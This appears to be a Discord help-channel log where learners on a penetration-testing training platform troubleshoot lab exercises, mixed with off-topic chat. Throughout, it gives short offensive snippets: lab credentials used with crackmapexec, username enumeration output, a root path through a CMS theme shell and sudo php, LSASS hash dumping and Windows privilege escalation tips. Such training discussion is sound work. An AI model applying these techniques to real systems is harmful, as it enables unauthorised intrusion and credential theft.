the module also covered other methods like kerbrute iirc

okay i read the old text on medium lab and found ftp port number i did a scan on particular port it is closed

last time -p- took more than hour and half tho

i reseted many times still has this iusse

for example this:

shows me no other users

spoiler btw

not supposed to take that long

||┌─[✗]─[htb-student@skills-par01]─[~] └──╼ $sudo crackmapexec smb 172.16.7.50 -u AB920 -p weasal --users SMB 172.16.7.50 445 MS01 [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False) SMB 172.16.7.50 445 MS01 [+] INLANEFREIGHT.LOCAL\AB920:weasal||

many suggested reset the machine and wait for 5min then scan it tho im trying his hope this works

try the command ||net user /domain|| when authenticated as A**

Giving me an error.. || Access is denied.Evil-WinRM PS C:\Users\net user /domain
The request will be processed at a domain controller for domain INLANEFREIGHT.LOCAL.

net.exe : System error 5 has occurred.
+ CategoryInfo : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError||

strange

you can try the tool rpc client iirc it has an option for enumerating domain users or use the tool kerbrute covered in the module

Like I said - I tried all the options.. both external in linux and internal in windows.. I'm really outt of ideas

merry christmas bro

you should always target DC for user enum, non DC machines don't have records of all the users

it works

anyone can recommend a healthy office chair for long hours from an online store
cuz i cant feel my back

what do you need help with

wrong channel for this lol but I use a steelcase gesture

Wrong channel but I recommend Herman Miller Embody 👀

I know wrong channel but goddammmmmmm, I checked it out did not expect the price

Why are y'all's chairs more expensive than my computer 😭

hey if you wfh + study with free time like me, might as well get something good if I'm spending 12+ hours on it every day

Good point, but does it give good benefit to do more modules (pretend to be on topic). Like diff between a $100 gaming chair and a $1200 office chair

All the people I know that have them swear by the Herman Millers

In the task 1 of the skill assessment, we are given a loaded shellcode and have to modify it's assembly code to decode the shellcode and I have done the modifications required to decode it and even got the decoded shellcode but running it does not give me the flag

yeah you automatically become a better hacker if you have an epic gaming chair 😎

you will get backpain if you spend too long on cheap chairs that's for sure

Getting a Herman Miller ASAP

Tested it out recently in store

Also have a standing desk on the way

what have you tried? it's not too complicated, XOR the values in the stack with a loop and move the pointer by 8 bytes every loop, then with the shellcode decoded, you can just be lazy and copy them out form gdb, remove all the 0x and use the shellcode loader script to run it. it can also be done entirely from cyberchef once you have decompiled it
Intro to Assembly Language Skills Assessment 1 (edited to help whoever is searching for this, hello :)

Anyway sorry, off topic

Does anyone have any feedback on the SOC Analyst path?

Good..ask on the #cdsa if more detail

I know and I did exactly the same thing you are telling but somehow my shellcode isn't working

dm me your code, I'll take a look

I had a choice between aeron, embody and gesture, went with gesture, the better choice imo

That's the only one I haven't tried out. Will see if i can track one down

Ohh I see the Gesture is from SteelCase

Just solved getting started module's final machine ⚡..my intuition told me to edit theme.php of get simple cms and get a shell and run sudo -l on the shell ..I found php ..it could be run without sudo password..then i spawn /bin/bash with php's system() function and i got root ..⭐ I had so much fun and learned so much ! I'm loving it 😍

Introduction to Digital Forensics (Rapid Triage Examination & Analysis Tools)
hi guys, I completed all the module but I still stuck at this question, someone can help me?

oh, that one was a doozy

tell you to analyze USN, how did it was analyzed in the module?

I think after running something on it, it can be opened in a tool, then you are gonna wanna use the zone identifier information like the question tells you to

It took be quite a bit of fumbling

• 0 What is the type of the service of the "syslog.service"?

||rsyslog.service - System Logging Service
Loaded: loaded (/lib/systemd/system/rsyslog.service; enabled; vendor preset: enabled)
Active: active (running) since Mon 2023-12-25 16:28:37 UTC; 45min ago
Docs: man:rsyslogd(8)
http://www.rsyslog.com/doc/
Main PID: 1121 (rsyslogd)
Tasks: 4 (limit: 2317)
CGroup: /system.slice/rsyslog.service
└─1121 /usr/sbin/rsyslogd -n
||

is the answer not ||System Logging Service||

happy holidays btw :)

You can DM, if you haven't already figured it out the injection attacks - skills assessment.

anyone faced issues whereby you can't RDP in?

just a blank black screen.

hit enter

ohhh

LOL THANKS

Module : Attacking Common Services

Activity Question : Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

Question : do I need to bruteforce the .htb or the .com seems like I don't get any results from enumerating the .htb domain

Got a flag from using the dig function to the .com domain but most likely a rabbit hole

guys i just invited one of my friends to hackthebox academy but i still did not get any cubes

is this real ?

The question says you should use .htb

okok, I'll focus on .htb weird no results and always timeout. target is listed down on /etc/hosts as well

Why in /etc/hosts?
You have to use the target server as nameserver

I see okay okay thanks

Please help me with the HTTP ATTACKS skills assessment. I'm stuck and can't figure out why the messages aren't coming. I have dissync, I have an explicit TE.CL which I implemented via TE.TE, I bypassed the WAF by load encoding, and I used CRLF header injection. But I still haven't been able to receive messages in mailhog

I follow the method how it analyzed in the module but still didn't find anything of useful. I tried all type of the program .exe that I looking during the analyzing of the USN but still nothing

did you convert it to a .csv?

Yup

what are you using to anlayze it?

I tried with MFT Analyzer (but I didn't get information from that program, that obv) and Timeline explorer

i used timeline explorer

use it to look at zone identifier info

I tried also the string in powershell to search the zone Identifier into Downloads folder

did you know you can create filters for each particular field on timeline exporer?

Yup

I filter the program "uninstall.exe" with the PID

the best I can do without giving the answer is telling you to read up on zone identifier and try to filter with it

if you filter by unninstall.exe, you won't find any other exe

Mh.. true

btw thank you for the hint, now I know I'm in the right path

Use the "cobaltstrike_beacon" index and the "bro:http:json" sourcetype. What is the most straightforward Splunk command to pinpoint beaconing from the 10.0.10.20 source to the 192.168.151.181 destination? Answer format: One word

I'm not sure what it expects as one word

for reference, thnks 🙂

Is the answer one of these commands or do I fill it up?

Hey everyone, I'm doing Footprinting module and I'm struggling to complete medium lab.. after gaining some credentials for users ||Alex|| and ||sa|| I can't use any of them to complete the exercise.. can anyone help me please?

strange

Open as admin

Do you mean to open the terminal as an admin?

Open the db gui as admin if you're unfamiliar with command line sql queries

Attacking common services goes over cli stuff

Hello Everbody,
I am using tcp433 vpn and it works but when I do a netcat search it cannot find a host. What could be the reason.
Happy New Year ))

Netcat search?

netcat 94.237.56.188:52910
94.237.56.188:52910: forward host lookup failed: Unknown host

I get this error

Netcat is a connection protocol, 94.237.56.188 is the ip, if I remember you need to specify the host separately just after specifying the host

Target: 94.237.56.188:52910
Time Left: 66 minute(s)

Apply what you learned in this section to grab the banner of the above server and submit it as the answer.

I have a task like this, won't I do it with netcat?

I.e. netcat 94.237.56.188 52910

okey i try

thanks @fathom pendant

"What you learned in this section" is the key here, what did that learning section teach you

Usually the questions will relate to what you just learned

Use the cracked password of the user Kira, log in to the host, and read the Notes.zip file containing the flag. Then, submit the flag as the answer.
Password Attacks - Protected Files

I even tried mutated-password list, nothing came up.

I got the Notes.zip via ftp.
did zip2john Notes.zip > zip.hash

john --wordlist=custom.list , yet ..nothing.

52910 I still don't understand what this part is. Isn't it with the IP

have you tried rockyou.txt

It should be in the mutated list, if not try rockyou

Yeah, none work.

Neither nor.

That's odd

What the f UTF -8 is not valid?

That's the rockyou.txt file

looks like a public web server matched to the port 80

Which one?

The mutated pwd or the rockyou?

I need help

The notes.zip passwd is definitely in mutated list

Alright, I will try to do some shenanigans.

Will be back if I can't do it.

same

Make sure the zip2john didn't create an empty file. Iirc this one needs to be run with python2 (could be wrong tho)

Yeah, I opened it.

There's a difference though, I looked up this:

.

His came without *

That's just Discord reading * as markdown since they haven't put it as a code block

Copy it and see you'll get the same

^

Started to pass PersistencelsFutile got stuck. I can't get the flag, I'm stuck on 5. Writes

Sounds like a box or something

Read #welcome to find out how to access more of the server

That list is 94k words yeah?

Issue 5 is partially remediated

Sirg this channel is for help with academy modules

Around that.

Then it should be right

I just did a grep and it's in there

So for sure John should crack it

I just don't get what that error message is Loaded 1 password hash (PKZIP [23/64])

And why doesn't it crack.

-crash recovery file is locked

Rm that crash file

rm ~/.john/john.rec

Done.

Now try again?

Oh damn.

Yeah.

Marcie is a huge W.

!!!

Thx Marcie.

Reading is crucial

I don't get what that crash file was for, though.

It probably had a weird error

Okay I went to another place for help

and borked ¯_(ツ)_/¯

y0s

(╯°□°)╯︵ ┻━┻

Cool bye

I give up, i wanna cry

bud, just dm me, I'll try to help

module attacking common applications - attacking gitlab.
i am asked to find another user, already got this list ||┌──(chilledvains㉿kali)-[~/htb-academy/new one]
└─$ ./gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt |grep [+]
[+] The username bob exists!
[+] The username root exists!
[+] The username public exists!
[+] The username help exists!
[+] The username hacker exists!
[+] The username explore exists!
||

but none work..

I don't see the valid username in the output

the username is case sensitive btw

my last message is gone somehow. but linpeas brought me the answer

Probably because it revealed a direct way to get the answer

yes, it dumped the user database from git for me.

¯_(ツ)_/¯

The password attacks easy lab wasn't that bad. Is it that common for crackmap exec to bug out?

hey guys

Wsg.

all's great dude

how bout ya

Glad to hear

Meh, doing my work, nothing much

--local-auth go brr

i am trying to find something but, i guess my brain is fooling me

Share what's on ur mind.

Have you guys heard of greysec or some og old dead forum, starting with the same name or having a similar name?

That's unrelated to the channel topic

#general

am new here

Read #welcome to figure out how to access more of the server

aha

What if I make a lab with EDR.

Whenever you join a server it's always good to read the #welcome and/or #rules channels

Chaoslab.

sure

MMMMMMM

Hi, I am doing the passwords attacks lab and having trouble extracting NTLM hashes from LSASS dump file with pypykatz. I am running the same command as in the module but pypykatz states it is unable to parse the dump file.

Do I need to upgrade pypykatz or is this a separate issue?

Sounds like a separate issue

nvm tried it again, something must have gone wrong during file transfer

im in Getting Started Module at Knowledge check
i found the password, cracked it, logged in as admin
but i cant get the metasploit payload to work, i think the TARGETURI is not the right one, can someone give me a hint?

RHOST, RPORT, LHOST are the things you need to change

yes i did

If you messed with TARGETURI that's likely to have messed with it

default it is blank, i tried it this way, but auth doesnt work then.
when i try /admin/ it authenticates but wont exec the payload

Then you might also be using the wrong payload

okay good point

Make sure it's for the right version of the plugin

okay i did not have to use the payload for authenticated file upload
i can just use the unauth rce

😉

men i always forget to take a step back and look the big picture

Don't forget to shell and sudo -l

😄

kk

okay got it, thanks @fathom pendant

hi guys

what modules should i get into for brand new people who wanna get into hacking

Information Security Fundamentals path

ok ty

i dont have enough cubes 😦

you don't buy all modules at once

and for tier 0 modules you get the cubes back when you complete them

for tier 1 and above you get 20% back

o

ok ty

also how cna i test stuff bc i closed my free web based parrot os

and im on windows

virtual machine

the "setting up" module goes through setting a vm up iirc

good idea

ty

im in nmap medium assessment, i dont know why but the script doesnt give me any information about the dns, does that mean IDS is blocking it?

Hi , I can always STRICTLY checked the public records for the inlanefreight.com domain in linux using the dig or nslookup command right?

what does "apt list" show you if not all installed packages?

head -n 5

there you will see something interesting :)

Hi i'm having some problem in Windows Event Logs & Finding Evil
Tapping Into ETW. After following the guide and using SilkETW.exe I don't have ManagedInteropMethodName that starts with "G" and ends with "ion".

the only answer i found is TdhGetEventMapInformation

||My message got deleted maybe cause of a spoiler so I'm writing it again with a spoiler filter. Everything work until the last command SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 -ot file -p C:\windows\temp\etw.json I don't get the expected results. Maybe its something I have to change but im not sure what||

try from the pwnbox

im looking for a buddy that we can learn about hacking together 🙂

bc i wanna get into hacking and having a buddy with me learning and we can chat about would motivate me and it mmight motivate u too so just reach out

@fiery sundial hello can I join with you buddy

How can we start

lets just be friends!! and we like help each other ig

like friends that wanna learn to code

i add u

Yeah what do you know some basic stuffs can you tell me

Hi

#welcome #general

I need help

anyone else wanna be buddys with me and learner

ill be ur fren, fren

Okie

OMG yoo im still stuck on the easy lab you're in medium, what coomand did you put to pass it?

using the pwnbox

hi guys, for the command injection skill assessment, i figured out the injection point, but my command to read the Flag is displayed as output instead of executing it as command. please can i DM someone, i just need some help to figure out where i am making mistake.

strange

As i can remember i used the aggressive flag -A to perform all default scripts like the flag -sC does

@lucid sluice

do you mind if i dm you? Im stuck on that skill assesment, tried ||loads of server side javascript injection payloads, and also mongodb utilities like $ne, $gte, furthermore tried editing content-type to application/json and json payloads||

Can anyone help me?!
I stuck in this module for some reason I can not do zone transfer. I connected to vpn I write ip and domain to /etc/hosts file
I am using "dig axfr inlanefreight.htb @ipv4" command I restarted target I connected another vpn server but still I can not do zone transfer can someone help me

guys do i need to install nmap or do i just have it?

what errors did you get?

it usually comes preinstalled

Basic error I think, failed zone transfer

ok

strange

that command

Yeah, I think my pc tired 😂 I will try again

I know that command supposed to work, there is something with my internet

dig axfr inlanefreight.htb @ip

you still need to specify the name server

I know and I already did

name server being the IP

:P

otherwise you may also need to add the nameserver to /etc/hosts (using either nslookup or dig ns

eyo @next bronze my cracking is !FAST! offline it is so so fun

I no longer hate cracking

hahaha this is great!

nice

they should put a disclaimer on the hashcat module to not use it in a vm

some hashes are still a pain though, namely bcrypt and yescrypt

hiiiiiiiiiiiiiiiiiiiiiiii

not a gen chat read #welcome and #rules to find out how to access more of the server

thanks

Testing

I just joined couple of minutes ago

nice to meet you all

Hey, I'm in the pivoting module in the SocksOverRdp section. When I try to load SocksOverRDP-Plugin.dll using regsvr32.exe, I get the following error. I've already disable windows defender

Ill try that later, ty

why am i gettig this error? ./backupjob: line 1: syntax error near unexpected token newline' ./backupjob: line 1: <head>'

you need to be more specific

In pivoting mod where we find routes that AutoRoute 172.x.x.x , i have created a msfvnom file when i cat that i didnt see the binary after re-run that i gottacha

you still have realtime protection running

No, when I had it, I go the error of: Operation didn't complete successfully because this file might be a virus of malicious software. After I turned it off in settings I got this different error

Good day and merry christimas, Can someone guide to the right direction? what can I do? My live usb kali does not boot.

EXT4-fs error (device sda3): ext4_lookup:1853 inode:5505046 comm systemd-journal: deleted inode referenced: 5515237 
EXT4-fs error (device sda3): ext4_lookup:1853 inode:5505046 comm systemd-journal: deleted inode referenced: 5511556
EXT4-fs error (device sda3): ext4_lookup:1853 inode:5505046 comm systemd-journal: deleted inode referenced: 5511556```

I had the same problem. Try running cmd as admin. That fixed it for me

Okay I'll try it now, ty!

Make sure the dll is still in the folder and not deleted by the protection first

And confirm realtime protection is off.

I'll pay attention to all of those, thank you

@fathom pendant hello I am doing assesment
You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer. from
Attacking Common Services - Easy
I found the username and password
and logged into the account mysql
I am unable to get the reverse shell
can you please help me?

IPv4 Active Routing Table

Subnet Netmask Gateway

|| 10.129.0.0 255.255.0.0 Session 1
172.16.4.0 255.255.254.0 Session 1
|| Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x) why its says wrong? when submit those

Might be how you formatted it. Try IP:netmask can't remember myself

nah still its not working

Can someone understand this? Why this is happening? I changed my VPN server 5 times and restarted I also wait 5-6 minute then tried again but still simple zone transfer failing

If I remember correctly there were 2 screenshots where they ran auto routes. I had the same issue I was using the wrong ones

is pinging moderator allowed?!

What is it about?

[msf](Jobs:1 Agents:1) post(multi/manage/autoroute) >> run ||autoroute -s 172.16.5.0/23||

[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[] Running module against 10.129.202.64
[] Searching for subnets to autoroute.
[] Did not find any new subnets to add.
[] Post module execution completed
i did with /23 /24 /16 still couldn't find more

It is about zone transfer and I am failing I have no Idea why

#modules message

you’re on the right track

And what does that have to do with a moderator? 😉

I think maybe they are know what is happening

The answer is in the screenshots provided in the lesson I believe. I'm not near my computer to test

A zone can be configured so that a zone transfer is not allowed from every host. The module shows alternative ways.

I can't see exactly what you are doing in your video on my cell phone because it is simply too small

I showed that I write ip and domain of target to /etc/host file and I have normal connection with vpn and I tried zone transfer as module shows but failed. Thank you for your attention BTW

The entry in the hosts file is unnecessary.
However, you must use the target IP as NameServer.

As I said, you can configure a zone so that not everyone can carry out a zone transfer.

try in pwnbox too

||172.16.4.0/172.16.5.0|| its say wrong bruh , oh okay

I've managed to make it work up until the last step needed, I get an error when trying to connect as jason, I looked at the hint but I don't find any way to bypass it

I'll look at my notes in a bit

usually the value after the / should be the netmask

Yea it should be netmask

Screenshot?

yessss

thanks guys

Can I use spoilers on images btw?

Yes

Okay sending rn

Can I dm you for a sec?

Sure but I don't have my computer near me. Might not be as much help as you would want.

Thank you very much. I found answer. Can you focus one more thing?! Sometime VPN file (from protocol choosing location) is not working

But from this location it is worked

When I download vpn file from corner of qestion section zone transfer immedieatly worked, I think it is bug or something. It was all about vpn file

@lusty thicket you were right, using the pwnbox it works, i have no idea why tho

version difference probably

hi. Im doing the CrackMapExec Module, but i cannot figure it out these question (Which domain account, other than Guest and krbtgt, is disabled?) in 'Finding Secrets and Using Them' chapter. Can someone help? (using the commands: proxychains4 -q crackmapexec smb 172.16.1.10 -u robert -p Inlanefreight01! --ntds --enabled and proxychains4 -q crackmapexec smb 172.16.1.10 -u robert -p Inlanefreight01! --ntds)

use netexec instead, at the end it will give you a command to find enabled accounts, modify slightly and you can filter for disabled accounts

FOOTPRINTING Module: Oracle TNS, but all I get is: bash: sqlplus: command not found, how do I fix this ?

or you can just cat the ntds log file saved by cme

install sqlplus

yeah, i got it. the thing that was bugging my mind was that --enabled wasn't doing nothing(in output), but with cat is shows the answer

thank you @next bronze

Can y'all explain what must have happened with the IDS . How was it fooled ?

because 53 is dns it basically treated the request as a dns pass-through request (because bad config)

it's explained in the DNS proxy section of the IDS/IPS filtering section that taught you how to scan/identify/connect and all that

Yes ! Got it ! Thank you @fathom pendant !

This was funn...

also should probably delete this

as this is revealing how to get the answer for a skill exam

Sorry

i get you're excited about sharing that you learned things

Deleted

but you do have to be careful with sharing that excitement

Yes ,noted

Hi guys, can someone help me with the 8 question in the module "AD Enumeration & Attacks - Skills Assessment Part II"?. Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host. I have tried everything I can think of but I don't know how to continue.

My brain had told me to do a full scan . Like all the ports. But i refused to believe that there will be something running on later ports . I was looking all over at 21,22,80 and even 3306

check all the accounts you have creds to and what they can access

Dont know if this is the right place to ask but why cant i spawn the target machine in "dancing" startingpoint box?

this indeed is not the right place

Where would that be?

read #welcome on how to access more of the server so you can access #starting-point

Hi i was thinking of getting a sub to the main platform. Is there any student discount there cuz I could not find one

it's more nuanced tbh https://help.hackthebox.com/en/articles/5192347-university-offerings iirc you have to go through your university for it on the main platform

I do not think my uni has support for it and I have almost completed my graduation so I do not think I will get any kind of response about it

Can I dm you?

I don't have the exact steps, check with the accounts you have access to

You can dm me if you need help

so does nmap use multiple source ports? maybe bc multithreading?

*cant see in this picture but further down it also uses different source ports

sometimes yes

Anyone know what could be the issue here, neither John or Hashcat is recognizing my txt file as an hash to crack, trying to get cleartext password: no matter if I try to input the hash as string or file, I get this error: john --format=Raw-MD5 ./hash.txt
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)

the text file has nothing else inside it except the hash gained from scanner/ipmi/ipmi_dumphashes

you sure the hash is supposed to be raw md5?

I tried nearly every other as well, not getting a single hit where john even tries to crack it

I'm not sure about john but there's a specific hashcat mode for ipmi hashes, check hashcat examples

I wonder if he updated the ssl on hashcat.net lol

But hashcat -h will have the list in there

can you elaborate

Hashcat.net ssl expired, so the example hashes page wouldn't load

It literally has nothing to do with any commands you're running

is it? works for me

When I checked like last week it wasn't

if you're doing the footprinting module the mode is given in the section

So likely fixed in that time

It's working, but getting the same issue as john: Hashfile './hash.txt' on line 1 (7e6357...efa123456789abcdef140561646d696e): Token length exception
No hashes loaded.

what's your hashcat command

You need to use the right mode

hashcat -a 0 -m 400 ./hash.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-05.txt

double check if nothing like hashcat.txt:...........actualhash is in the file

like I said, it's not md5, let alone the phpass md5 that you're using

400 isn't the right mode

ive had this after converting the hash

find the right mode, either in the section or hashcat example

<ctrl-f> 'ipmi' on https://hashcat.net/wiki/doku.php?id=example_hashes

oh yeah I tried 7300 as well, but It's the same issue, wont load the hash for the life of me

text file appears to be clean

7300 should work

try with --username

Does anyone know how I can intercept a USB signal to understand how a keyboard's API works?

Google

hashcat --example-hash | awk -v RS= "/SHA-1/"

the RS= with a blank means it uses a blank row as delimiter, and /SHA-1/ is your search term, this way you can look easy for the hash modes by filtering

😞

wtreality)

my dear and priceless friend

Sorry for the inconvenience, I only asked here because I've already searched everywhere and I'm out of ideas.

This isn't the place to ask

Read #welcome on how to access more of the server

Got it to work, thank you all for help 👍 Idk why but having most of the issues with password cracking always

with --username?

I made the hashfile again, and it looked exactly the same but worked now

maybe there was a space or such

Probably a weird extra character

¯_(ツ)_/¯

token length exception means you missed a character or have an extra character somewhere

He learned how to read

google translete v help)

XDXDDXDD

To help

hello guyz finished my cpts path, if anyone needs help with anything let me know here or feel free to DM. This way I can double check some stuff I may have missed somewhere in my brainz, also I can contribute a little to this community. Have a nice day 😊

and merry christmas 🎄

can you double check my flags by just giving them to me and i will not elaborate or tell you what i did

Hey, in the skill assessment of pivoting module, how are we supposed to find hosts on the internal networks?
I used ping sweep with increased timeout to actually get something, and nmap returns host is up for all the network. It seems like these two are not very stable/consistent in finding hosts

proxychains doesn't support ICMP (ping) for nmap you need to use -sT

Need some assistance for Active Directory skills assessment pt2. Priv esc from the service account in SQL01 to get the flag in the administrator desktop. Potato doesn't seem like that way (Can't get the exploits to run), PrintSpoofer always creates a new cmd/powershell with the same service account instead of SYSTEM..

potato is the way

Okay

I'll try and figure out why they won't run then 😦

if I remember right you need to use juicy potato, choose a CLSID

Can I contact a DM for help assessing skills for HTTP ATTACKS?

yez which one u need

all

i made it with printspoofer

i sent me a reverse as SYSTEM

Hmm, I'll give that another try then. I wasn't trying to get a rev shell. But the interactive shell it gave back was the exact same user.

the reason i chose a rev shell is because i was in the mssqlclient.py

dont know how u are doing it

didnt we have command execution directly in the host connected to the internal?

yeah it will pop open another window by default, if you don't have gui access you can't get that shell

You have to somehow scan the internal network to find the last host. @next bronze I tried your solution but when it finishes going over all the ip addresses it just starts again and doesn't finish for some reason

you have ms-dos command execution i think

do a standard ping sweep

i remember i had to repeat it

also check the arp table

we were down for about a day because of that 🙂

That's what I ended up doing, but it's not very consistent and I had to increase the timeout a couple times for it to find something

i know

try ligolo-ng also

i just happened to be unlucky that day ig lmao

yeah, it caught me off guard as well, took about a day for the person with access to get to it 🙂

cause i was looking to see if asrep was a thing but it doesn't look like it

and even running the hash to see if it autodetected it didn't know

¯_(ツ)_/¯

That's so weird. Staying in the same process it kept the same user. But a reverse shell worked and I got SYSTEM.

^ it doesn't inject the system shell in the current process

That's a good thing to learn now 🙂

What for?

Merry Christmas y'all, I'm stuck grabbig the flag into Env Enum section from Linux Priv Escalation, I found another user than "htb-student" this user has 2 interesting files, one related to vim & the other to cache, but none of them htb-student has permission to read.

I found another interesting thing with sudo -l command, but when I ran the command I'm receiving this message, Sorry, user htb-student is not allowed to execute '/usr/bin/ncdu' as root on ubuntu.

the better pivoting tool, though I would recommend doing that module with the tools given, those will come in handy sometime

I've seen someone who mentioned it here. Is it introduced later in the course? Or just something worth while adding to my toolbox?

it's not introduced/mentioned in the course at all

it's not, but it's my go to for pivoting for a while now

it's just a tool that people have recommended after struggling with the introduced tools

(though still good to know how to do things other ways)

huh weird, did you figure it out?

it just looks like it's not supported yet i'll have to pull up the hash to get the exact format of it

do you remember the e type?

but it was like krb5tgs$23$ iirc

oh that's 13100

Good to know. Btw, nmap still hasn't returned, I used: ||proxychains nmap 172.16.6.0/24 -sT -oN hosts||. Am I missing something?

etype 23

i tried it said no

hashcat doenst' support asrep?

pretty srue it does no?

i think it had something to do with the salt maybe?

lemme check

it does, that's the most common supported hash

for kerberos

It doesn't suppport asrep18 which is AES key encrypted

most people don't see many other kerberos etypes

only for asrep23 which is rc4

https://hashcat.net/wiki/doku.php?id=example_hashes

this is true

17/18 and etype 3 all have limited/no support still

though that's mostly for lack of priority iirc

yescrypt support when 😡 /j

oh god

soon™️

$krb5asrep$23$ is the start could it be the username having @ in it? username@domain?

https://github.com/MWR-CyberSec/configmgr-cryptderivekey-hashcat-module I found this hashcat plugin for ASREP etype 18 but, haven't tried it.

thats a little different

huh interesting

-oN saves the output, if you want to supply a hosts file use -iL, and if you just want to do a quick sweep do -F

i just chalked it up to "htb said no cracking this one" ¯_(ツ)_/¯

I saw that john has support for etype 18, but it failed to crack it (I know the password)

always be a little careful with unofficial modules/plugins like this, as the plugin system is built to execute essentially raw c code

raw chicken code?

Yup yup, If I had to build it, I would have to build it inside a sandbox

this is 18200, Kerberos 5, etype 23, AS-REP

not nearly as common as 13100

but certainly supported

yeah, or just take a peak into the module/kernel sources

as the format is very simple and shouldn't really be more than a few hundred lines

well, relatively simple

isn't 13100 kerberoast rc4, it's not asrep

yeah, not asrep

18200 is asrep

this is the 13100 signature

and this is the 18200 signature

yeah i was misremembering

because i did a LOT of googling at the time

and was like "well that's CLOSE"

 $krb5asrep$23$user@domain.com:3e156ada591263b8aab0965f5aebd837$007497cb51b6c8116d6407a782ea0e1c5402b17db7afa6b05a6d30ed164a9933c754d720e279c6c573679bd27128fe77e5fea1f72334c1193c8ff0b370fadc6368bf2d49bbfdba4c5dccab95e8c8ebfdc75f438a0797dbfb2f8a1a5f4c423f9bfc1fea483342a11bd56a216f4d5158ccc4b224b52894fadfba3957dfe4b6b8f5f9f9fe422811a314768673e0c924340b8ccb84775ce9defaa3baa0910b676ad0036d13032b0dd94e3b13903cc738a7b6d00b0b3c210d1f972a6c7cae9bd3c959acf7565be528fc179118f28c679f6deeee1456f0781eb8154e18e49cb27b64bf74cd7112a0ebae2102ac 

if your hash looks like this

it should be supported

if it doesn't look like this, then we'll have to see what the difference is and why it looks different

I have a note file that is just a quick list of super handy hashcat modes

which happens from time to time

our coverage isn't perfect, especially as already called out for etype17/18/3

though i think someone did the work for 17 recently so it may just be 18/3 left

i swear i tried 18200 before and it said no

but i could just be mentally handicapped

i didn't need to crack it anyway for the purposes of the module (yet)

fair enough, if you run into it again let me know and ill debug with you

but was just like "wtf, i swear i did this before"

and running just hashcat file.hash should give the correct mode yeah?

well, in theory yes

but less than perfectly

in theory* if it's not being goofy

if you have issues with the format in your file, it obviously can't tell

and of course, plenty of hashes can't be identified that way

oh wassup, I always forget youre the hashcat dev everytime lul

Auto detect mode would do the trick yeah. or else it'll give you the closes modes to choose from.

🙂

undercover dev

heh

0 rank on htb

0 rank on this account 😛

a blue name for someone working on such a critical tool gives some cognitive dissonance

yeah that is sorta funny actually

LMAO

No hacking just cracking

crack deez chestnuts (please i am weak and require nutrition)

i dont know if there's a role for "works on the thing you're using" in here or not

Good way to confirm that rank means nothing

i think they got rid of a lot of vanity roles

Nope but perhaps there should be such a role

¯_(ツ)_/¯

https://tenor.com/view/obi-wan-kenobi-of-course-i-know-him-hes-me-gif-12774102

whenever someone mentions hashcat dev

lol first time I saw you here I was like this guy definitely knows what's they're talking about, checked the profile and hashcat dev

Oh well they did have some sort of cross community contributor role for people like john Hammond. wonder if they kept that or tossed it

i dont think its that necessary, but i can see how it'd be confusing to be blue and also the primary source for this info lol

it's alright tbh kinda lets you blend in with the plebs lmao

yeah, probably cuts down on a lot of the DMs

@languid fjord petition for @paper gust to get cross community contributor role for being the hashcat dev(if they want it)

¯_(ツ)_/¯

@surreal rain

if it helps with others' visibility

otherwise I don't mind

also tbh lowkey love the feature for outputfile and outfile-format

I think it would personally

this went through some decent changes around the last release and is now pretty useful

i need to go through and add some stuff to it

and make debug files and such more like outfiles

cause even though most regulars know rank doesnt mean shit, its very easy for most people to dismiss blue name people not realizing they may in fact be active in critical work lol

Will have to think that one over. Traditionally it's been reserved for other discord communities. But this is a good use case i think as well

yeah, i hadnt really been paying attention to the colors/ranks but i could see how it'd be confusing

one thing i did find is that if you already did crack without specifying an outfile - then you need to add --show for it to produce one

to be fair, we DO have an official discord server/community

yeah even though its not true, people often consider blue==newb

correct, this is the intended workflow actually

which again, makes sense tbh

you can also do some cute tricks

like --show and --username respect eachother

outfile just saves the output right?

i was messing around with it the other day

oh yes --show --username is great with potfile

yup, can make quite work of an NTDS dump

ye the output of the hash:password (if you specify format you can have it JUST give the password)

assuming you dont have TOO many usernames

there's a hidden danger with --show/--username mixing

it compounds the search space when it reparses/searches everything

which can lead to some very very very long runtimes

am i right in assuming if you do --username and --outfile-format=2 (password) that it would out put username:password or is that something i'd have to tinker with to figure out

iirc we added a message that warns users of that

yes it should, assuming you are doing it with --show

Can have it for now at least

during the attack, i dont think it will

interesting

nice

great to pick your brains on this lol i'm sure the outfile and format stuff was a pain to get working properly

if you have any better role ideas, I'm open to whatever, sounds like others were just concerned about visibility

it's been through some iterations

and needs to go through another

we have a large change being staged right now

i think what i did before was do something like cut -d ":" -f1,7 for NTLM hashes

once the next big set of changes and the next release come out

i'm overhauling the logging/debug/outfile/etc.

NICE

logging especially could use some serious work

the current log format is for hashcat, not for it's users

need to bridge the gap a bit

LOL "yes it stopped on this, but why"

yeah, and internal codes that are raised by not defined

the numbers mason, what do they mean

trying to figure out what the status codes are without them being mapped to the log is a hurdle

I just want to find hosts that are up/active

idk if it's in the works (or how feasible it is) with token length exception error (which to most people it's obvious that it's too short/long and they goofed) to specify that the expected file is too short/long as it is right now i don't see many issues with it but it can definitely help with some minor/quick debugs

like "oh i left in an extra space"

this is a bit more complicated of an error than it sounds

yeah i figured

the problem is that token length exception is NOT hash length exception

its token length

when you load a formatted "hash" into hashcat, we take it through a parsing step we call the "tokenizer" that breaks it down into several pieces and validates each one separately based on some rules we define in each module

this is great for us, but leads to an uncomfortable situation where if it fails the raised errors are generic

ah like NTLM stuff being broken down into it's defined sections

here, i have a good example

  token.token_cnt  = 6;

  // username
  token.sep[0]     = ':';
  token.len_min[0] = 0;
  token.len_max[0] = 60;
  token.attr[0]    = TOKEN_ATTR_VERIFY_LENGTH;

  // unused
  token.sep[1]     = ':';
  token.len[1]     = 0;
  token.attr[1]    = TOKEN_ATTR_FIXED_LENGTH;

  // domain
  token.sep[2]     = ':';
